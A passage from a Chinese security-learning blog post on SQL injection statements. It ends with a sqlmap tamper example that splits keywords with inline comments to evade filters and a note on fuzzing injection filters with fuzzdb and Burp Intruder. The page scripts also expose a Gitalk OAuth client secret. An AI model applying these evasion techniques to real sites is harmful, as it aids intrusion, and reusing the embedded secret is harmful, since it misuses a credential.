class="line">作用：用注释符分割sql关键字 </span><br><span class="line">使用脚本前：tamper(&apos;INSERT&apos;) </span><br><span class="line">使用脚本后：I/**/N/**/SERT</span><br></pre></td></tr></table></figure>

<p><a href="https://blog.csdn.net/qq_34444097/article/details/82717357" target="_blank" rel="noopener">原文链接</a></p>
<h3 id="5-2-SQL注入FUZZ测试"><a href="#5-2-SQL注入FUZZ测试" class="headerlink" title="5.2 SQL注入FUZZ测试"></a>5.2 SQL注入FUZZ测试</h3><p><strong>Fuzzdb:</strong><a href="https://github.com/fuzzdb-project/fuzzdb下载文件，使用burp的Intruder载入字典，设置好payload的位置，可以进行fuzz测试" target="_blank" rel="noopener">https://github.com/fuzzdb-project/fuzzdb下载文件，使用burp的Intruder载入字典，设置好payload的位置，可以进行fuzz测试</a><br>根据Intruder attack中返回request中的长度，对过滤的关键字进行判断，便于手注，或者编写tamper 也可以编写python脚本，载入字典文件，进行批量检测 </p>
<p><strong>参考文章：</strong></p>
<p><a href="https://xz.aliyun.com/t/253/" target="_blank" rel="noopener">https://xz.aliyun.com/t/253/</a></p>

            </div>
            <hr />

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">写作不易，客官能否打赏一杯奶茶？</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone" data-wechat-qrcode-helper="<p>微信里点“发现”->“扫一扫”二维码便可查看分享。</p>"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            

    <div class="reprint" id="reprint-statement">
        <p class="reprint-tip">
            <i class="fa fa-exclamation-triangle"></i>&nbsp;&nbsp;
            <span>转载规则</span>
        </p>
        
            <div class="center-align">
                <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                    <img alt=""
                         style="border-width:0"
                         src="https://i.creativecommons.org/l/by/4.0/88x31.png"/>
                </a>
            </div>
            <br/>
            <span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text"
                  property="dct:title" rel="dct:type">
                    《第六周：数据库相关注入语句的收集和学习》
                </span> 由
            <a xmlns:cc="http://creativecommons.org/ns#" href="/2019/09/19/第六周：数据库相关注入语句的收集和学习/" property="cc:attributionName"
               rel="cc:attributionURL">
                jax
            </a> 采用
            <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                知识共享署名 4.0 国际许可协议
            </a>进行许可。
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>


        </div>
    </div>

    
    <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '33d864a9c7caa36ac605',
        clientSecret: '96fe6b2c418dae68776161edbec54e6736f881aa',
        repo: 'the-wind-hunter.github.io',
        owner: 'the-wind-hunter',
        admin: "the-wind-hunter",
        id: '2019/09/19/第六周：数据库相关注入语句的收集和学习/',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>
    

    

    

    

    
    <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments input[type=text],
    #vcomments input[type=email],
    #vcomments input[type=url],
    #vcomments textarea {
        box-sizing: border-box;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #42b983;
        font-weight: 500;
        text-decoration: underline;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div id="vcomments" class="card-content"></div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<!-- <script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script> -->

<script>
    new Valine({
        el: '#vcomments',
        appId: '',
        appKey: '',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'false' === 'true',
        avatar: 'wavatar',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '如果你没有GitHub账号，还可以在这里评论啦！'
    });
</script>

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2019/09/29/第九周：web-页面解析的流程学习/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="第九周：web 页面解析的流程学习">
                        
                        <span class="card-title">第九周：web 页面解析的流程学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            第九周：web 页面解析的流程学习0x00 本周学习内容1、理解域名解析的整个过程
2、理解 web 页面请求的整个流程，绘制流程图（nginx 处理的 11 个过程）
3、学习 http 协议中的字段及含义
4、学习 http 请求方法以
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-09-29
                        </span>
                        <span class="publish-author">
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/09/05/第四周-数据库系统功能相关学习/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="第四周-数据库系统功能相关学习">
                        
                        <span class="card-title">第四周-数据库系统功能相关学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
日期：2019-08-21
作者：无风
简介：学习MySQL自带的函数

0x01 任务要求
学习数据库自带函数的功能和用法
进行udf提权的实验

0x02 MySQL自带函数学习菜鸟教程MySQL函数学习
本文参考资料大多来自于菜鸟教
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-09-05
                            </span>
                        <span class="publish-author">
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: the-wind-hunter<br />'
            + '作者: jax<br />'
            + '链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () { bodyElement.removeChild(newdiv); }, 200);
    });
</script>

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


    <footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            &copy; 2019 WeiYang. All Rights Reserved.

            
            &nbsp;<i class="fa fa-area-chart"></i>&nbsp;站点总字数:&nbsp;
            <span class="white-color">40.4k</span>
            

            <br>
            <span id="sitetime"></span>

            
            
            <br>
            
            <span id="busuanzi_container_site_pv" style='display:none'>
                <i class="fa fa-heart-o"></i>
                本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
            <span id="busuanzi_container_site_uv" style='display:none'>
                人次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
            </span>
            
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/godweiyang" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="mailto:i@godweiyang.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="https://zhihu.com/people/godweiyang" class="tooltipped" target="_blank" data-tooltip="访问我的知乎" data-position="top" data-delay="50">
        <i class="fa fa-inverse">知</i>
    </a>



    <a href="https://user.qzone.qq.com/792321264" class="tooltipped" target="_blank" data-tooltip="访问我的QQ空间" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>



    <a href="https://weibo.com/godweiyang" class="tooltipped" target="_blank" data-tooltip="关注我的微博" data-position="top" data-delay="50">
        <i class="fa fa-weibo"></i>
    </a>



    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fa fa-rss"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>

<!-- 不蒜子计数初始值纠正 -->
<script>
    $(document).ready(function () {

        var int = setInterval(fixCount, 50);
        var pvcountOffset = 80000;
        var uvcountOffset = 20000;

        function fixCount() {
            if (document.getElementById("busuanzi_container_site_pv").style.display != "none") {
                $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + pvcountOffset);
                clearInterval(int);
            }
            if ($("#busuanzi_container_site_pv").css("display") != "none") {
                $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + uvcountOffset); // 加上初始数据 
                clearInterval(int);
            }
        }
    });
</script>

<script language=javascript>
    function siteTime() {
        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
        year - 作为date对象的年份，为4位年份值
        month - 0-11之间的整数，做为date对象的月份
        day - 1-31之间的整数，做为date对象的天数
        hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
        minutes - 0-59之间的整数，做为date对象的分钟数
        seconds - 0-59之间的整数，做为date对象的秒数
        microseconds - 0-999之间的整数，做为date对象的毫秒数 */
        var t1 = Date.UTC(2017, 09, 11, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "本站已运行 " + diffYears + " 年 " + diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }/*因为建站时间还没有一年，就将之注释掉了。需要的可以取消*/
    siteTime();
</script>

    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <script type="text/javascript"> var OriginTitile = document.title, st; document.addEventListener("visibilitychange", function () { document.hidden ? (document.title = "Σ(っ °Д °;)っ喔哟，崩溃啦！", clearTimeout(st)) : (document.title = "φ(゜▽゜*)♪咦，又好了！", st = setTimeout(function () { document.title = OriginTitile }, 3e3)) })
    </script>

    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id="></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', '');
</script>



    
    <script src="/libs/others/clicklove.js"></script>
    

    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    <!-- 雪花特效 -->
    

</body>

</html>